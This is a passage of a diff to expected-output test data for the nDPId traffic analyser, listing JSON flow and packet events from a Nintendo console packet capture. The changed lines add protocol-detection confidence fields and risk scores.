 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1500731320732,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"ts_msec":1500731320732,"pkt":"fLuKifuEAA6OGXEMCABFAABY97kAADIRdZVbCPMjwKgMcsEYy5cARD+fMquYZAJwBDs0OpYMdoXMEb7z5ADj1gGyYiTWHIsmvR+Tfti6\/9NW0mVVtdYcxe3DWV6ogDbeCRSMhnlF"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320764,"flow_last_seen":1500731320764,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1500731320764,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1500731320764,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"ts_msec":1500731320764,"pkt":"AA6OGXEMfLuKifuECABFAABYEUIAAEARHhzAqAxyhgP4GcuX3nsARKmOMquYZAL7A4GWfECoPkHlkau7Ijb2F2MvtOU+dosmvR+Tfti6\/9NW0mVVtday4XIk1NfCl4ZHAO\/1Fxpd"}
-00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320764,"flow_last_seen":1500731320764,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1500731320764,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","ndpi": {"proto":"Nintendo","breed":"Fun","category":"Game"}}
+00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320764,"flow_last_seen":1500731320764,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1500731320764,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320774,"flow_last_seen":1500731320774,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1500731320774,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1500731320774,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"ts_msec":1500731320774,"pkt":"AA6OGXEMfLuKifuECABFAABYEUMAAEARMBfAqAxybRX\/C8uXxEsARC8cMquYZAJGA3KWhoRABV3FWfmtjLEwkvqReL4g94smvR+Tfti6\/9NW0mVVtdahZ4Yi8EkEbE+Cf5dTG6Dk"}
-00603{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320774,"flow_last_seen":1500731320774,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1500731320774,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","ndpi": {"proto":"Nintendo","breed":"Fun","category":"Game"}}
+00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320774,"flow_last_seen":1500731320774,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1500731320774,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1500731320842,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"ts_msec":1500731320842,"pkt":"fLuKifuEAA6OGXEMCABFAABYEicAADMRKjeGA\/gZwKgMct57y5cARE+8MquYZAIZA8hA\/JaGDMK+3tfYvFe22fqmgHrRaYsmvR+Tfti6\/9NW0mVVtdaFuHgj\/oXYMvE1kVZddtPK"}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1500731320881,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"ts_msec":1500731320881,"pkt":"fLuKifuEAA6OGXEMCABFAABYK0gAADIRJBJtFf8LwKgMcsRLy5cARH7BMquYZAKvA36Er5aJDtEHqQojRhZUoJvCATzcAYsmvR+Tfti6\/9NW0mVVtdYSzDno2v3JjwLx3wkvum1y"}
 00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1500731320971,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"ts_msec":1500731320971,"pkt":"fLuKifuEAA6OGXEMCABFAAC497sAADIRdTNbCPMjwKgMcsEYy5cApCSHMquYZAJwBDw1LZb\/EXOjSMMnhE7iZD46YMnDknY2Toj8H3hexFk8t\/NxtrnGBe7\/azeV+ylrxOZLEJSeqtaVZpj8qkFUmEqDrAokbYC5tpC2hu85m1Gapy+z4MYRc6NIwyeETuJkPjpgycOS4O1pGafPZccfGHcxxjvnUp7EdqfBF4phVhM5G67auDF2qW+tEyxBQPI1F2LvuWv4"}
@@ -20,23 +20,23 @@
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1500731322761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1500731322761,"pkt":"fLuKifuEAA6OGXEMCABFAAA0FZhAAOUGcZ02uwq5wKgMcgG7vMgz\/J69i298C4AQALmNxAAAAQEICgQM25wAGmE2"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731323269,"flow_last_seen":1500731323269,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1500731323269,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1500731323269,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":1500731323269,"pkt":"AA6OGXEMfLuKifuECABFAABoEV8AAEARLjHAqAxyI55KPcuXgjcAVAoAMquYZAIAAACgRQAAPD+rAYcrvhgZcqXY4tF4R087lVXf\/uabOP7DTtPl\/Z68o2TwyTMiy\/1PT8Q0PYJjfL9\/FaWie4QujpeJZMzmHA=="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731323269,"flow_last_seen":1500731323269,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1500731323269,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","ndpi": {"proto":"Nintendo.AmazonAWS","breed":"Acceptable","category":"Game"}}
+00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731323269,"flow_last_seen":1500731323269,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1500731323269,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1500731323270,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":1500731323270,"pkt":"AA6OGXEMfLuKifuECABFAABoEWAAAEARLjDAqAxyI55KPcuXgjcAVAoAMquYZAIAAACgRQAAPD+rAYcrvhgZcqXY4tF4R087lVXf\/uabOP7DTtPl\/Z68o2TwyTMiy\/1PT8Q0PYJjfL9\/FaWie4QujpeJZMzmHA=="}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1500731323270,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":1500731323270,"pkt":"AA6OGXEMfLuKifuECABFAABoEWEAAEARLi\/AqAxyI55KPcuXgjcAVCUqMquYZAIAAACgRgAAPD+rAYcrvhgZcqXY4tF4R087lVXf\/uabOP7DTtPl\/Z68o2TwyTMiy\/1PT8Q0PYJjeofEEG4mAZPKsmIYZ3XQPw=="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326270,"flow_last_seen":1500731326270,"flow_idle_time":180000,"flow_min_l4_payload_len":688,"flow_max_l4_payload_len":688,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":688,"midstream":0,"ts_msec":1500731326270,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":52119,"dst_port":34343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1500731326270,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":730,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":730,"pkt_l4_len":696,"ts_msec":1500731326270,"pkt":"AA6OGXEMfLuKifuECABFAALMEW8AAEARl9zAqAxyNArNscuXhicCuLNGMquYZAEAAACsAAAACAICgAAAAAAAZU1IgACGJwAAAAAPAfz\/AmL\/\/\/\/\/\/\/\/\/\/\/\/\/DNhnHrgUDeqh96EJudpqr7HTWmwuyiNXAoN8EJ3L9Q9BYy53b12QoycQBbgF0+MGumCDqya3DRDi\/FgfUDp8jmtF0eLtdJawWMd0Uh7gRi0nJAedvr+L4LDG+1PkKHdQjXkwcc63uSwXLbhZGs5rZ8pLuCki3H7JLOG5CI96WiAzLSOgOT5MmMOkBR9lHnUbly8I57OvnsPjzu2ZoGj750rOuJoq4PDp+HTtcuUkR\/yuCERU5DE5fS3WD79Od2EljENI\/Aj0rbyEoWaVKXUGbMeIN\/PHtUKEKwxkiH\/DZpj\/dOZVZle2A+wpaUtVb5Kkq8m0M0sj8U0Nr8\/f9iy5nCcQHobd29hf9qcfXx\/tCnteI0cP0tyykizOxpnlPK2I0STXsPD0wxOnU\/OOfu8Wm3V94s2PEbCeAbRx8PvXHbjtAm8AnmQMBMeFM6TQwwpijOYTfaXxrgmiFU\/AHPdepp0ILcWD5QSKt4MWDsJ\/eC61SjGvCVRvXn2JW5KB\/4JQcfZHw4S\/auTmIFCllOyidDXFohQ4NU8A9vt0e5qrI\/cou3U09qQhgu6ncsvX+jQusCyJhx1EpdaFLaOseb4xo0IjeHtTg5uKzMiP+l3dg6BJfcICpsS0fKy4Lvcxzq4iHlV\/CkZw5k\/5qPEe1WClYIIYAQ1QuHKqZOMgl0qEP1biit38pQoNuI5A\/WZ4yptUyrSpaVacwxp5yZkU47ddcg7lId\/wkwQjzVN9BmlVIcEupSyiP64T8RypU57m5OsmKDUV8cUXr\/nGnwi\/96TbsG+A6i29VkTJzG6j04DbRd\/2rnSbi4lJUC2\/\/AUQQJGvBPVxZ\/JcWHrRv6UUWsmJyg=="}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326599,"flow_last_seen":1500731326599,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1500731326599,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1500731326599,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1500731326599,"pkt":"AA6OGXEMfLuKifuECABFAABgEXIAAEARz1fAqAxywKgMAUm6ADUATBSXAEkBAAABAAAAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAE="}
-00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326599,"flow_last_seen":1500731326599,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1500731326599,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326599,"flow_last_seen":1500731326599,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1500731326599,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00750{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1500731326628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"ts_msec":1500731326628,"pkt":"fLuKifuEAA6OGXEMCABFAAELMF9AAEARb7\/AqAwBwKgMcgA1SboA95AtAEmBgAABAAkAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAHADAAFAAEAAAAeAB8OZDNmdGhwdnY3Znp4MDAKY2xvdWRmcm9udANuZXQAwFAAAQABAAAAPAAENsAb2cBQAAEAAQAAADwABDbAG8TAUAABAAEAAAA8AAQ2wBsnwFAAAQABAAAAPAAENsAbUcBQAAEAAQAAADwABDbAG0rAUAABAAEAAAA8AAQ2wBuuwFAAAQABAAAAPAAENsAbaMBQAAEAAQAAADwABDbAGwg="}
-00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"ts_msec":1500731326628,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.217"}}
+00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"ts_msec":1500731326628,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.217"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326644,"flow_last_seen":1500731326644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1500731326644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1500731326644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1500731326644,"pkt":"AA6OGXEMfLuKifuECABFAAA8EXNAAEAGCZbAqAxyNsAb2aItAbvSLGpEAAAAAKACgABWsQAAAgQFUAEDAwYEAggKABpxjAAAAAA="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1500731326676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1500731326676,"pkt":"fLuKifuEAA6OGXEMCABFAAA8AABAAPUGZgg2wBvZwKgMcgG7oi3AHA3T0ixqRaAScSCE4wAAAgQFrAQCCAqn0Wp9ABpxjAEDAwg="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1500731326680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1500731326680,"pkt":"AA6OGXEMfLuKifuECABFAAA0EXRAAEAGCZ3AqAxyNsAb2aItAbvSLGpFwBwN1IAQAg4imAAAAQEICgAaca+n0Wp9"}
-00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731326644,"flow_last_seen":1500731326686,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1500731326686,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731326644,"flow_last_seen":1500731326729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1500731326729,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01255{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":97,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731326644,"flow_last_seen":1500731326731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":1500731326731,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}}
+00987{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731326644,"flow_last_seen":1500731326686,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1500731326686,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01044{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731326644,"flow_last_seen":1500731326729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1500731326729,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": 